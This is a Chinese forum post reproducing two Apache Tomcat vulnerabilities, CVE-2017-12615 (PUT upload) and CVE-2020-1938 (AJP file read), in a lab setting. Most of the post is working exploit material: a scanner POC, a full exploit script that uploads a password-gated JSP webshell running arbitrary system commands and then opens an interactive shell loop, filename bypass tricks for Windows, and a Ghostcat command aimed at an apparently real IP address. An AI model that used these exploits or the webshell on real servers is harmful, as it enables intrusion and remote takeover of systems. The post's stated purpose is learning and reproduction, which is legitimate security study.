Tomcat--文件上传--文件包含--(CVE-2017-12615)&&(CVE-2020-1938) ...

打印 上一主题 下一主题

主题 896|帖子 896|积分 2688

Tomcat--文件上传--文件包含--(CVE-2017-12615)&&(CVE-2020-1938)

复现环境

采用Vulfocus靶场环境进行复现,搭建操作和文章参考具体搭建教程参考vulfocus不能同步的解决方法/vulfocus同步失败
CVE-2017-12615 文件上传

漏洞简介

当存在漏洞的Tomcat运行在Windows/Linux主机上, 且启用了HTTP PUT请求方法( 例如, 将readonly初始化参数由默认值设置为false) , 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的JSP的webshell文件,JSP文件中的恶意代码将能被服务器执行, 导致服务器上的数据泄露或获取服务器权限。
影响范围

Apache Tomcat 7.0.0 - 7.0.79
漏洞复现

环境启动后,抓包将GET方法改为PUT方法,将木马文件内容放在PUT最后

木马文件使用哥斯拉冰蝎等webshell管理工具生成,将文件内容填入即可。使用工具连接
方法二(适用于Windows系统)
添加文件名2.jsp%20,添加shell脚本
方法三(适用于Windows系统)
添加文件名3.jsp:DATA,添加shell脚本
POC

使用方法
  1. python3 CVE-2017-12615 POC.py -u http://xxxx -p端口
复制代码
  1. #CVE-2017-12615 POC
  2. __author__ = '纸机'
  3. import requests
  4. import optparse
  5. import os
  6. parse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT] [-f FILE]')
  7. parse.add_option('-u','--url',dest='URL',help='target url')
  8. parse.add_option('-p','--port',dest='PORT',help='target port[default:8080]',default='8080')
  9. parse.add_option('-f',dest='FILE',help='target list')
  10. options,args = parse.parse_args()
  11. #print(options)
  12. #验证参数是否完整
  13. if (not options.URL or not options.PORT) and not options.FILE:
  14.         print('Usage:python3 CVE-2017-12615-POC.py [-u url] [-p port] [-f FILE]\n')
  15.         exit('CVE-2017-12615-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')
  16. filename = '/hello.jsp'
  17. #测试数据
  18. data = 'hello'
  19. #提交PUT请求
  20. #resp = requests.post(url1,headers=headers,data=data)
  21. #验证文件是否上传成功
  22. #response = requests.get(url2)
  23. #上传文件
  24. def upload(url):
  25.   try:
  26.     response = requests.put(url+filename+'/',data=data)
  27.     return 1
  28.   except Exception as e:
  29.     print("[-] {0} 连接失败".format(url))
  30.     return 0
  31. def checking(url):
  32.   try:
  33.     #验证文件是否上传成功
  34.     response = requests.get(url+filename)
  35.     #print(url+filename)
  36.     if response.status_code == 200 and 'hello' in response.text:
  37.       print('[+] {0} 存在CVE-2017-12615 Tomcat 任意文件读写漏洞'.format(url))
  38.     else:
  39.       print('[-] {0} 不存在CVE-2017-12615 Tomcat 任意文件读写漏洞'.format(url))
  40.   except Exception as e:
  41.                 #print(e)
  42.     print("[-] {0} 连接失败".format(url))
  43. if options.FILE and os.path.exists(options.FILE):
  44.   with open(options.FILE) as f:
  45.     urls = f.readlines()
  46.     #print(urls)
  47.     for url in urls:
  48.       url = str(url).replace('\n', '').replace('\r', '').strip()
  49.       if upload(url) == 1:
  50.         checking(url)
  51. elif options.FILE and not os.path.exists(options.FILE):
  52.   print('[-] {0} 文件不存在'.format(options.FILE))
  53. else:
  54.   #上传链接
  55.   url = options.URL+':'+options.PORT
  56.   if upload(url) == 1:
  57.     checking(url)
复制代码
EXP

使用方法
  1. python3 CVE-2017-12615 EXP.py -u http://xxxx-p 端口
复制代码
  1. #CVE-2017-12615 EXP
  2. __author__ = '纸机'
  3. import requests
  4. import optparse
  5. import time
  6. parse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT]')
  7. parse.add_option('-u','--url',dest='URL',help='target url')
  8. parse.add_option('-p','--port',dest='PORT',help='target port[default:8080]',default='8080')
  9. options,args = parse.parse_args()
  10. #验证参数是否完整
  11. if not options.URL or not options.PORT:
  12.         print('Usage:python3 CVE-2017-12615-POC.py [-u url] [-p port]\n')
  13.         exit('CVE-2017-12615-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')
  14. url = options.URL+':'+options.PORT
  15. filename = '/backdoor.jsp'
  16. payload = filename+'?pwd=023&i='
  17. headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0"}
  18. #木马
  19. data = '''<%
  20.     if("023".equals(request.getParameter("pwd"))){
  21.         java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
  22.         int a = -1;
  23.         byte[] b = new byte[2048];
  24.         out.print("<pre>");
  25.         while((a=in.read(b))!=-1){
  26.             out.println(new String(b));
  27.         }
  28.         out.print("</pre>");
  29.     }
  30. %>'''
  31. #上传木马文件
  32. def upload(url):
  33.   print('[*] 目标地址:'+url)
  34.   try:
  35.     respond = requests.put(url+filename+'/',headers=headers,data = data)
  36.     #print(respond.status_code)
  37.     if respond.status_code == 201 or respond.status_code == 204:
  38.       #print('[*] 目标地址:'+url)
  39.       print('[+] 木马上传成功')
  40.   except Exception as e:
  41.     print('[-] 上传失败')
  42.     return 0
  43. #命令执行
  44. def attack(url,cmd):
  45.   try:
  46.     respond = requests.get(url+payload+cmd)
  47.     if respond.status_code == 200:
  48.       print(str(respond.text).replace("<pre>","").replace("</pre>","").strip())
  49.   except Exception as e:
  50.     print('[-] 命令执行错误')
  51. if upload(url) == 0:
  52.         exit()
  53. time.sleep(0.5)
  54. print('输入执行命令(quit退出):')
  55. while(1):
  56.   cmd = input('>>>')
  57.   if(cmd == 'quit'):
  58.     break
  59.   attack(url,cmd)
复制代码
CVE-2020-1938 文件包含

漏洞简介

Apache Tomcat AJP协议(默认8009端口)由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp目录下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步结合文件包含实现远程代码的执行
影响范围

Tomcat 6.*
Tomcat 7.* < 7.0.100
Tomcat 8.* < 8.5.51
Tomcat 9.* < 9.0.31
漏洞复现

只要使用了tomcat中间件,并使用了AJP协议(默认端口8009),符合漏洞版本就可以尝试复现。
  1. python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 47.98.193.176 -p 35839 -f WEB-INF/web.xml
复制代码
-f参数选择要包含的文件
以上内容仅作学习记录,如有错误或瑕疵,欢迎批评指正,感谢阅读。

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

缠丝猫

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表